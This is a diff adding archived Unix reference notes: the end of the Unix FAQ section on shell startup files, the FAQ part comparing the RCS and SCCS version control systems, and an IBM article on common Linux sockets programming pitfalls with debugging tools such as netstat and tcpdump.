however, it is better to check the variable $-. If $- contains
|
||||
an 'i', the shell is interactive. Test like so:
|
||||
|
||||
case $- in
|
||||
*i*) # do things for interactive shell
|
||||
;;
|
||||
*) # do things for non-interactive shell
|
||||
;;
|
||||
esac
|
||||
|
||||
|
||||
|
||||
Subject: What "dot" files do the various shells use?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
>From: tmb@idiap.ch (Thomas M. Breuel)
|
||||
Date: Wed, 28 Oct 92 03:30:36 +0100
|
||||
|
||||
5.6) What "dot" files do the various shells use?
|
||||
|
||||
Although this may not be a complete listing, this provides the
|
||||
majority of information.
|
||||
|
||||
csh
|
||||
Some versions have system-wide .cshrc and .login files. Every
|
||||
version puts them in different places.
|
||||
|
||||
Start-up (in this order):
|
||||
.cshrc - always; unless the -f option is used.
|
||||
.login - login shells.
|
||||
|
||||
Upon termination:
|
||||
.logout - login shells.
|
||||
|
||||
Others:
|
||||
.history - saves the history (based on $savehist).
|
||||
|
||||
tcsh
|
||||
Start-up (in this order):
|
||||
/etc/csh.cshrc - always.
|
||||
/etc/csh.login - login shells.
|
||||
.tcshrc - always.
|
||||
.cshrc - if no .tcshrc was present.
|
||||
.login - login shells
|
||||
|
||||
Upon termination:
|
||||
.logout - login shells.
|
||||
|
||||
Others:
|
||||
.history - saves the history (based on $savehist).
|
||||
.cshdirs - saves the directory stack.
|
||||
|
||||
sh
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.profile - login shells.
|
||||
|
||||
Upon termination:
|
||||
any command (or script) specified using the command:
|
||||
trap "command" 0
|
||||
|
||||
ksh
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.profile - login shells; unless the -p option is used.
|
||||
$ENV - always, if it is set; unless the -p option is used.
|
||||
/etc/suid_profile - when the -p option is used.
|
||||
|
||||
Upon termination:
|
||||
any command (or script) specified using the command:
|
||||
trap "command" 0
|
||||
|
||||
bash
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.bash_profile - login shells.
|
||||
.profile - login if no .bash_profile is present.
|
||||
.bashrc - interactive non-login shells.
|
||||
$ENV - always, if it is set.
|
||||
|
||||
Upon termination:
|
||||
.bash_logout - login shells.
|
||||
|
||||
Others:
|
||||
.inputrc - Readline initialization.
|
||||
|
||||
zsh
|
||||
Start-up (in this order):
|
||||
.zshenv - always, unless -f is specified.
|
||||
.zprofile - login shells.
|
||||
.zshrc - interactive shells, unless -f is specified.
|
||||
.zlogin - login shells.
|
||||
|
||||
Upon termination:
|
||||
.zlogout - login shells.
|
||||
|
||||
rc
|
||||
Start-up:
|
||||
.rcrc - login shells
|
||||
|
||||
|
||||
|
||||
Subject: I would like to know more about the differences ... ?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
A very detailed comparison of sh, csh, tcsh, ksh, bash, zsh, and
|
||||
rc is available via anon. ftp in several places:
|
||||
|
||||
ftp.uwp.edu (204.95.162.190):pub/vi/docs/shell-100.BetaA.Z
|
||||
utsun.s.u-tokyo.ac.jp:misc/vi-archive/docs/shell-100.BetaA.Z
|
||||
|
||||
This file compares the flags, the programming syntax,
|
||||
input/output redirection, and parameters/shell environment
|
||||
variables. It doesn't discuss what dot files are used and the
|
||||
inheritance for environment variables and functions.
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 5 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,368 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:33+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (7-7) ======
|
||||
Created 星期二 07 六月 2011
|
||||
Message-ID: <unix-faq/faq/part7_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (7/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:01 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part7
|
||||
Version: $Id: part7,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) An comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
7.5) What's an RCS symbolic name?
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
7.8) RCS vs SCCS: How do they handle problems?
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
7.10) RCS vs SCCS: Conversion
|
||||
7.11) RCS vs SCCS: Support
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
If you're looking for the answer to, say, question 7.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^7.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Introduction
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
|
||||
The majority of the replies (in a recent poll) were in favor of
|
||||
RCS, a few for SCCS, and a few suggested alternatives such as CVS.
|
||||
|
||||
Functionally RCS and SCCS are practically equal, with RCS having
|
||||
a bit more features since it continues to be updated.
|
||||
|
||||
Note that RCS learned from the mistakes of SCCS...
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do the interfaces compare?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
|
||||
RCS has an easier interface for first time users. There are less
|
||||
commands, it is more intuitive and consistent, and it provides
|
||||
more useful arguments.
|
||||
|
||||
Branches have to be specifically created in SCCS. In RCS, they
|
||||
are checked in as any other version.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: What's in a Revision File?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
|
||||
RCS keeps history in files with a ",v" suffix. SCCS keeps
|
||||
history in files with a "s." prefix.
|
||||
|
||||
RCS looks for RCS files automatically in the current directory or
|
||||
in a RCS subdirectory, or you can specify an alternate RCS file.
|
||||
The sccs front end to SCCS always uses the SCCS directory. If
|
||||
you don't use the sccs front end, you must specify the full SCCS
|
||||
filename.
|
||||
|
||||
RCS stores its revisions by holding a copy of the latest version
|
||||
and storing backward deltas. SCCS uses a "merged delta"
|
||||
concept.
|
||||
|
||||
All RCS activity takes place within a single RCS file. SCCS
|
||||
maintains several files. This can be messy and confusing.
|
||||
|
||||
Editing either RCS or SCCS files is a bad idea because mistakes
|
||||
are so easy to make and so fatal to the history of the file.
|
||||
Revision information is easy to edit in both types, whereas one
|
||||
would not want to edit the actual text of a version in RCS. If
|
||||
you edit an SCCS file, you will have to recalculate the checksum
|
||||
using the admin program.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: What are the keywords?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
|
||||
RCS and SCCS use different keywords that are expanded in the
|
||||
text. For SCCS the keyword "%I%" is replaced with the revision
|
||||
number if the file is checked out for reading.
|
||||
|
||||
The RCS keywords are easier to remember, but keyword expansion is
|
||||
more easily customized in SCCS.
|
||||
|
||||
In SCCS, keywords are expanded on a read-only get. If a version
|
||||
with expanded keywords is copied into a file that will be
|
||||
deltaed, the keywords will be lost and the version information in
|
||||
the file will not be updated. On the other hand, RCS retains the
|
||||
keywords when they are expanded so this is avoided.
|
||||
|
||||
|
||||
|
||||
Subject: What's an RCS symbolic name?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.5) What's an RCS symbolic name?
|
||||
|
||||
RCS allows you treat a set of files as a family of files while
|
||||
SCCS is meant primarily for keeping the revision history of
|
||||
files.
|
||||
|
||||
RCS accomplishes that with symbolic names: you can mark all the
|
||||
source files associated with an application version with `rcs
|
||||
-n', and then easily retrieve them later as a cohesive unit. In
|
||||
SCCS you would have to do this by writing a script to write or
|
||||
read all file names and versions to or from a file.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they compare for performance?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
|
||||
Since RCS stores the latest version in full, it is much faster in
|
||||
retrieving the latest version. After RCS version 5.6, it is also
|
||||
faster than SCCS in retrieving older versions.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Version Identification.
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
|
||||
SCCS is able to determine when a specific line of code was added
|
||||
to a system.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they handle problems?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.8) RCS vs SCCS: How do they handle problems?
|
||||
|
||||
If you are missing the sccs or rcs tools, or the RCS or SCCS file
|
||||
is corrupt and the tools don't work on it, you can still retrieve
|
||||
the latest version in RCS. Not true with SCCS.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they interact with make(1)?
|
||||
Date: Wed, 30 Dec 1992 10:41:51 -0700
|
||||
>From: Blair P. Houghton <bhoughto@sedona.intel.com>
|
||||
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
|
||||
The fact that SCCS uses prefixes (s.file.c) means that make(1)
|
||||
can't treat them in an ordinary manner, and special rules
|
||||
(involving '~' characters) must be used in order for make(1) to
|
||||
work with SCCS; even so, make(1) on some UNIX platforms will not
|
||||
apply default rules to files that are being managed with SCCS.
|
||||
The suffix notation (file.c,v) for RCS means that ordinary
|
||||
suffix-rules can be used in all implementations of make(1), even
|
||||
if the implementation isn't designed to handle RCS files
|
||||
specially.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Conversion.
|
||||
Date: Tue, 10 Jan 1995 21:01:41 -0500
|
||||
>From: Ed Ravin <elr@wp.prodigy.com>
|
||||
|
||||
7.10) RCS vs SCCS: Conversion.
|
||||
|
||||
An unsupported C-Shell script is available to convert from SCCS
|
||||
to RCS. You can find it in
|
||||
|
||||
ftp://ftp.std.com/src/gnu/cvs-1.3/contrib/
|
||||
|
||||
One would have to write their own script or program to convert
|
||||
from RCS to SCCS.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Support
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.11) RCS vs SCCS: Support
|
||||
|
||||
SCCS is supported by AT&T. RCS is supported by the Free Software
|
||||
Foundation. Therefore RCS runs on many more platforms, including
|
||||
PCs.
|
||||
|
||||
Most make programs recognize SCCS's "s." prefix while GNU make
|
||||
is one of the few that handles RCS's ",v" suffix.
|
||||
|
||||
Some tar programs have a -F option that ignores either RCS
|
||||
directories, or SCCS directories or both.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Command Comparison
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
|
||||
SCCS RCS Explanation
|
||||
==== === ===========
|
||||
|
||||
sccs admin -i -nfile file ci file Checks in the file
|
||||
for the first time,
|
||||
creating the revision
|
||||
history file.
|
||||
|
||||
sccs get file co file Check out a file for
|
||||
reading.
|
||||
|
||||
sccs edit file co -l file Check out a file for
|
||||
modification.
|
||||
|
||||
sccs delta file ci file Check in a file
|
||||
previously locked.
|
||||
|
||||
what file ident file Print keyword
|
||||
information.
|
||||
|
||||
sccs prs file rlog file Print a history of
|
||||
the file.
|
||||
|
||||
sccs sccsdiff -rx -ry file rcsdiff -rx -ry file Compare two
|
||||
revisions.
|
||||
|
||||
sccs diffs file rcsdiff file Compare current with
|
||||
last revision.
|
||||
|
||||
sccs edit -ix-y file rcsmerge -rx-y file Merge changes between
|
||||
two versions into
|
||||
file.
|
||||
|
||||
??? rcs -l file Lock the latest
|
||||
revision.
|
||||
|
||||
??? rcs -u file Unlock the latest
|
||||
revision. Possible
|
||||
to break another's
|
||||
lock, but mail is
|
||||
sent to the other
|
||||
user explaining why.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Acknowledgements
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
|
||||
I would like to thank the following persons for contributing to
|
||||
these articles. I'd like to add your name to the list--please
|
||||
send comments or more references to Bill Wohler <wohler@newt.com>.
|
||||
|
||||
Karl Vogel <vogel@c-17igp.wpafb.af.mil>
|
||||
Mark Runyan <runyan@hpcuhc.cup.hp.com>
|
||||
Paul Eggert <eggert@twinsun.com>
|
||||
Greg Henderson <henders@infonode.ingr.com>
|
||||
Dave Goldberg <dsg@mbunix.mitre.org>
|
||||
Rob Kurver <rob@pact.nl>
|
||||
Raymond Chen <rjc@math.princeton.edu>
|
||||
Dwight <dwight@s1.gov>
|
||||
|
||||
|
||||
|
||||
Subject: Can I get more information on configuration management systems?
|
||||
Date: Thu Oct 15 10:27:47 EDT 1992
|
||||
>From: Ted Timar <tmatimar@isgtec.com>
|
||||
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
Bill Wohler, who compiled all of the information in this part of
|
||||
the FAQ, has compiled much more information. This information is
|
||||
available for ftp from ftp.wg.omron.co.jp (133.210.4.4) under
|
||||
"pub/unix-faq/docs/rev-ctl-sys".
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 7 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
3715
Zim/Programme/APUE/FAQ/Unix_Programming_FAQ_(v1.37).txt
Normal file
@@ -0,0 +1,263 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T22:53:56+08:00
|
||||
|
||||
====== Five pitfalls of Linux sockets programming ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.ibm.com/developerworks/linux/library/l-sockpit/
|
||||
First introduced into the 4.2 BSD UNIX® operating system, the Sockets API is now a standard feature of any operating system. In fact, it's hard to find a modern language that doesn't support the Sockets API. The API is a relatively simple one, but new developers can still run into a few common pitfalls.
|
||||
|
||||
This article identifies those pitfalls and shows you how to avoid them.
|
||||
|
||||
Pitfall 1. Ignoring return status
|
||||
|
||||
The first pitfall is an obvious one, but it's an error that new developers make most often. If you ignore the return status of functions, you may miss when they fail or partially succeed. This, in turn, can propagate the error, making it difficult to locate the source of the problem.
|
||||
|
||||
Instead of ignoring status returns, capture and check each and every one. Consider the example of a socket send function shown in Listing 1.
|
||||
|
||||
Listing 1. Ignoring API function status return
|
||||
|
||||
int status, sock, mode;
|
||||
|
||||
/* Create a new stream (TCP) socket */
|
||||
sock = socket( AF_INET, SOCK_STREAM, 0 );
|
||||
|
||||
...
|
||||
|
||||
status = send( sock, buffer, buflen, MSG_DONTWAIT );
|
||||
|
||||
if (status == -1) {
|
||||
|
||||
/* send failed */
|
||||
printf( "send failed: %s\n", strerror(errno) );
|
||||
|
||||
} else {
|
||||
|
||||
/* send succeeded -- or did it? */
|
||||
|
||||
}
|
||||
|
||||
|
||||
Listing 1 explores a function snippet that performs a socket send (sending data through a socket). The error status of the function is captured and tested, but this example ignores a feature of send in non-blocking mode (enabled by the MSG_DONTWAIT flag).
|
||||
|
||||
Three classes of return values are possible from the send API function:
|
||||
|
||||
If the data has been successfully queued for transmission, a zero is returned.
|
||||
If a failure has occurred, a -1 is returned (and that failure can be understood through the use of the errno variable).
|
||||
If not all characters could be queued in the call, the number of characters sent is the final return value.
|
||||
|
||||
Because of the non-blocking nature of the MSG_DONTWAIT variant of send, the call returns after sending all, some, or none of the data. Ignoring the return status here would result in an incomplete send and subsequent loss of data.
|
||||
|
||||
Back to top
|
||||
|
||||
Pitfall 2. Peer socket closure
|
||||
|
||||
One of the interesting aspects of UNIX is that you can view almost everything as a file. Files themselves, directories, pipes, devices, and sockets are treated as files. This is a novel abstraction and means that a collective set of APIs can be used over a wide range of device types.
|
||||
|
||||
Consider the read API function, which reads some number of bytes from a file. The read function returns the number of bytes read (up to the maximum that you specify), -1 on error, or zero if the end of the file has been reached.
|
||||
|
||||
If you read from a file and reach the end (indicated by a zero-length read), you'd close the file and be done. The same thing applies in a socket, but the semantics are a little different. If you perform a read on a socket and get a zero return, this indicates that the peer at the remote end of the socket has called the close API function. The indication is the same as the file read -- no more data can be read through the descriptor (see Listing 2).
|
||||
|
||||
Listing 2. Proper handling of the read API function return value
|
||||
|
||||
int sock, status;
|
||||
|
||||
sock = socket( AF_INET, SOCK_STREAM, 0 );
|
||||
|
||||
...
|
||||
|
||||
status = read( sock, buffer, buflen );
|
||||
|
||||
if (status > 0) {
|
||||
|
||||
/* Data read from the socket */
|
||||
|
||||
} else if (status == -1) {
|
||||
|
||||
/* Error, check errno, take action... */
|
||||
|
||||
} else if (status == 0) {
|
||||
|
||||
/* Peer closed the socket, finish the close */
|
||||
close( sock );
|
||||
|
||||
/* Further processing... */
|
||||
|
||||
}
|
||||
|
||||
|
||||
The closure of a peer socket can also be detected with the write API function. In this case, you'll receive a SIGPIPE signal or, if this signal is blocked, the write function will return a -1 and set errno to EPIPE.
|
||||
|
||||
Back to top
|
||||
|
||||
Pitfall 3. Address in use error (EADDRINUSE)
|
||||
|
||||
You can use the bind API function to bind an address (an interface and a port) to a socket endpoint. You can use this function in a server setting to restrict the interfaces from which incoming connections are possible. You can also use this function from a client setting to restrict the interface that should be used for an outgoing connection. The most common use of bind is to associate a port number with a server and use the wildcard address (INADDR_ANY), which allows any interface to be used for incoming connections.
|
||||
|
||||
The problem commonly encountered with bind is attempting to bind a port that's already in use. The pitfall is that no active socket may exist, but binding to the port is still disallowed (bind returns EADDRINUSE), which is caused by the TCP socket TIME_WAIT state. This state keeps a socket around for two to four minutes after its close. After the TIME_WAIT state has exited, the socket is removed, and the address can be rebound without issue.
|
||||
|
||||
Waiting for TIME_WAIT to finish can be annoying, especially if you're developing a socket server and you need to stop the server to make changes and then restart it. Luckily, there's a way to get around the TIME_WAIT state. You can apply the SO_REUSEADDR socket option to the socket, such that the port can be reused immediately.
|
||||
|
||||
Consider the example in Listing 3. Prior to binding an address, I call setsockopt with the SO_REUSEADDR option. To enable address reuse, I set the integer argument (on) to 1 (otherwise, you can set it to 0 to disable address reuse).
|
||||
|
||||
Listing 3. Avoiding the "Address In Use" error using the SO_REUSEADDR socket option
|
||||
|
||||
int sock, ret, on;
|
||||
struct sockaddr_in servaddr;
|
||||
|
||||
/* Create a new stream (TCP) socket */
|
||||
sock = socket( AF_INET, SOCK_STREAM, 0 ):
|
||||
|
||||
/* Enable address reuse */
|
||||
on = 1;
|
||||
ret = setsockopt( sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on) );
|
||||
|
||||
/* Allow connections to port 8080 from any available interface */
|
||||
memset( &servaddr, 0, sizeof(servaddr) );
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr = htonl( INADDR_ANY );
|
||||
servaddr.sin_port = htons( 45000 );
|
||||
|
||||
/* Bind to the address (interface/port) */
|
||||
ret = bind( sock, (struct sockaddr *)&servaddr, sizeof(servaddr) );
|
||||
|
||||
|
||||
After you have applied the SO_REUSEADDR socket option, the bind API function will always permit immediate reuse of the address.
|
||||
|
||||
Back to top
|
||||
|
||||
Pitfall 4. Sending structured data
|
||||
|
||||
Sockets are a perfect vehicle for sending unstructured binary byte-streams or ASCII streams of data (such as HTML pages over HTTP, or e-mail over SMTP). But if you try to send binary data over a socket, it becomes much more complicated.
|
||||
|
||||
Let's say you want to send an integer through a socket: can you be certain that the receiver will interpret the integer in the same way? Applications running on similar architectures can rely on their common platforms to interpret the type identically. But what happens if a client running on a big endian IBM PowerPC attempts to send a 32-bit integer to a little endian Intel x86? Byte ordering will cause the value to be interpreted incorrectly.
|
||||
To byte-swap or not?
|
||||
|
||||
Endianness refers to the byte ordering in memory. Big endian orders by most-significant byte first, whereas little endian orders by least-significant byte first.
|
||||
|
||||
Big endian architectures, such as the PowerPC®, have an advantage over little endian architectures such as the Intel® Pentium® series in that network byte order is big endian. This means that control data within the TCP/IP stack is naturally in order for big endian machines. Little endian architectures require byte-swapping -- a slight performance disadvantage for networked applications.
|
||||
|
||||
What about sending a C structure through a socket? You can run into trouble here as well, because not all compilers align the elements of a structure in the same way. The structure could also be packed to minimize wasted space, further misaligning the elements in the structure.
|
||||
|
||||
Fortunately, there are solutions to this problem that ensure consistent interpretation of data by both endpoints. In the old days, the Remote Procedure Call (RPC) toolkit provided what was called External Data Representation (XDR). XDR defined a standard representation for data to support the development of communicating heterogeneous network applications.
|
||||
|
||||
Today, a couple of newer protocols provide a similar capability. The Extensible-Markup-Language/Remote Procedure Call protocol (XML/RPC) marshals procedure calls over HTTP in an XML format. Data and metadata are encoded within XML and transported as ASCII strings, disassociating the values from their physical representation by the host architecture. SOAP followed XML-RPC and extends its ideas with greater features and functionality. See the Resources section for more information on each of these protocols.
|
||||
|
||||
Back to top
|
||||
|
||||
Pitfall 5. Framing assumptions in TCP
|
||||
|
||||
TCP provides no framing, which makes it perfect for byte-stream-oriented protocols. This is one of the key differences between TCP and the User Datagram Protocol (UDP). UDP is a message-oriented protocol that preserves the boundaries of messages between the sender and receiver. TCP is a stream-based protocol that assumes the data being communicated is unstructured, as shown in Figure 1.
|
||||
|
||||
Figure 1. Framing capabilities of UDP and the lack of framing in TCP
|
||||
Framing capabilities
|
||||
|
||||
The top of Figure 1 illustrates a UDP client and server. The peer on the left performs two socket writes of 100 bytes each. The UDP layer of the stack keeps track of the quantities of the writes and ensures that when the receiver on the right gets the data through the socket, it arrives in the same quantities. In other words, the boundaries of the messages that the writer provides are preserved for the reader.
|
||||
|
||||
Now, look at the bottom of Figure 1. It demonstrate the same granularity of writes for the TCP layer. Two independent writes to the stream socket of 100 bytes each are performed. But in this case, the reader of the stream socket gets 200 bytes. The TCP layer of the stack has aggregated the two writes. This aggregation can occur in either the sender or receiver TCP/IP stacks. It's important to note that the aggregation may not occur -- TCP guarantees only ordered delivery of the data.
|
||||
|
||||
This pitfall causes a quandary for most developers. You want the reliability of TCP but the framing aspects of UDP. Other than switching to a different transport protocol, such as the Stream Transmission Control Protocol (STCP), it's up to the application layer developer to implement the buffering and segmenting functionality.
|
||||
|
||||
Back to top
|
||||
|
||||
Tools for debugging sockets applications
|
||||
|
||||
GNU/Linux provides several debugging tools that can help you uncover problems in sockets applications. Further, using these tools can also be educational and help explain the behavior of your application and the TCP/IP stack. You'll get a quick overview of a few tools here, but check out the Resources below to learn more.
|
||||
|
||||
Viewing details of the networking subsystem
|
||||
|
||||
The netstat tool provides visibility into the GNU/Linux networking subsystem. With netstat, you can view currently active connections (on a per-protocol basis), view connections in a particular state (such as server sockets in the listening state), and many others. Listing 4 shows some of the options that netstat provides and the features they enable.
|
||||
|
||||
Listing 4. Usage patterns for the netstat utility
|
||||
|
||||
View all TCP sockets currently active
|
||||
$ netstat --tcp
|
||||
|
||||
View all UDP sockets
|
||||
$ netstat --udp
|
||||
|
||||
View all TCP sockets in the listening state
|
||||
$ netstat --listening
|
||||
|
||||
View the multicast group membership information
|
||||
$ netstat --groups
|
||||
|
||||
Display the list of masqueraded connections
|
||||
$ netstat --masquerade
|
||||
|
||||
View statistics for each protocol
|
||||
$ netstat --statistics
|
||||
|
||||
|
||||
A lot of other utilities exist, but netstat tends to be a one-stop shop that covers the capabilities of route, ifconfig, and other standard GNU/Linux tools.
|
||||
|
||||
Watching the traffic go by
|
||||
|
||||
With GNU/Linux, you can use several tools to inspect the low-level traffic on a network. The tcpdump tool is an older tool that "sniffs" network packets from a network and either prints them to stdout or logs them to a file. This functionality allows you to see the traffic that your application generates and also the low-level flow-control mechanisms that TCP generates. A newer tool called tcpflow complements tcpdump and provides a way to do protocol flow analysis and to properly reconstruct data streams, regardless of packet order or retransmissions. A couple of usage patterns for tcpdump are shown in Listing 5.
|
||||
|
||||
Listing 5. Usage patterns for the tcpdump tool
|
||||
|
||||
Display all traffic on the eth0 interface for the local host
|
||||
$ tcpdump -l -i eth0
|
||||
|
||||
Show all traffic on the network coming from or going to host plato
|
||||
$ tcpdump host plato
|
||||
|
||||
Show all HTTP traffic for host camus
|
||||
$ tcpdump host camus and (port http)
|
||||
|
||||
View traffic coming from or going to TCP port 45000 on the local host
|
||||
$ tcpdump tcp port 45000
|
||||
|
||||
|
||||
The tcpdump and tcpflow tools give you a huge number of options, including the ability to create complex filter expressions. Check the Resources below for more information on these tools.
|
||||
|
||||
Both tcpdump and tcpflow are text-based command-line tools. If you prefer a graphical user interface (GUI), an open source tool called Ethereal may fit the bill. Ethereal is a professional protocol analyzer that can help debug application layer protocols. Its plug-in architecture can decompose protocols such as HTTP or any other protocol you can think of (637 protocols at the time of this writing).
|
||||
|
||||
Back to top
|
||||
|
||||
Wrapup
|
||||
|
||||
Sockets programming is easy and enjoyable, especially if you avoid introducing bugs or at least make them easy to find by considering the five common pitfalls described in this article, in addition to standard defensive programming practices. GNU/Linux tools and utilities can also help bring to light problems in your programs. Remember: when checking out the man page of a utility, follow the related or "see also" tools. You might find a new tool that you can't do without.
|
||||
|
||||
Resources
|
||||
|
||||
Learn
|
||||
|
||||
The TCP State Machine includes eleven states. See W. Richard Steven's illustration from TCP/IP Illustrated, Volume 1.
|
||||
|
||||
Explore the history and implications of Endianness at Wikipedia.
|
||||
|
||||
Learn more about IBM's open, scalable, and customizable Power Architecture.
|
||||
|
||||
Read an introduction to RPC/XDR from the Programming in C courseware.
|
||||
|
||||
For more on XML-RPC and how to use it in a Java™ application, read "XML-RPC in Java programming" (developerWorks, January 2004).
|
||||
|
||||
SOAP builds on the features of XML-RPC. Find specifications, implementations, and tutorials and articles at SoapWare.Org.
|
||||
|
||||
SCTP combines features of TCP and UDP as well as features for availability and reliability.
|
||||
|
||||
